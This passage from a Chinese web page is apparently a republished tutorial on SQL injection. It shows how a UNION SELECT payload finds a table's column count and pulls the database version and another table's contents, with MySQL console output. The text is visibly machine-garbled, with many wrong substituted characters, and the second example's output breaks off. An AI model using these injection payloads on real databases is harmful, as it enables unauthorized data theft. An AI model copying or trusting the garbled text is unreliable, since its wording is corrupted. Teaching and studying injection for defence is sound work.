根本法:前后两个select语句的字段数要雷同,不然sql必定报错,所以可以用union指令断定数据表的字段数,根本构造办法:
- ...where...union select 1,2,3,4,...,x limit y,z
个中where子句可以没有,limit视情况而定,中心输入进去的1,2,3,4,…,x他们中的任何一个都可以用函数代替,最终他们在默认排序的情况下会被拼接到结不雅集的最后一行。例:
- mysql> select * from learning_test union select 1,version(),concat('sh','it'),4,5;
- +------+---------+---------+---------+----------------------+
- | num | column2 | column3 | column4 | bin_column |
- +------+---------+---------+---------+----------------------+
- | 1 | a | s | s | aaaaaaaa |
- | 2 | b | s | s | ddd |
- | 3 | c | s | s | wwwwwwww |
- | 4 | d | s | s | fffffff |
- | 1 | 5.5.53 | shit | 4 | 5 |
- +------+---------+---------+---------+----------------------+
- 5 rows in set (0.03 sec)
union萌芽强大年夜而灵活,因为他可以萌芽两个不合的表的信息,哪怕这两个表字段数不合,只要如许做:
- mysql> select * from learning_test union select 1,version(),3,group_concat(test_table),5 from test_table;
- +------+---------+---------+---------+----------------------+
- | num | column2 | column3 | column4 | bin_column |
- +------+---------+---------+---------+----------------------+
- | 1 | a | s | s | aaaaaaaa |
推荐阅读
【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦! 一、弱电智能化的内涵在>>>详细阅读
本文标题:关于SQL注入的一些技巧分享
地址:http://www.17bianji.com/lsqh/37551.html
1/2 1

网友点评
精彩导读
科技快报
品牌展示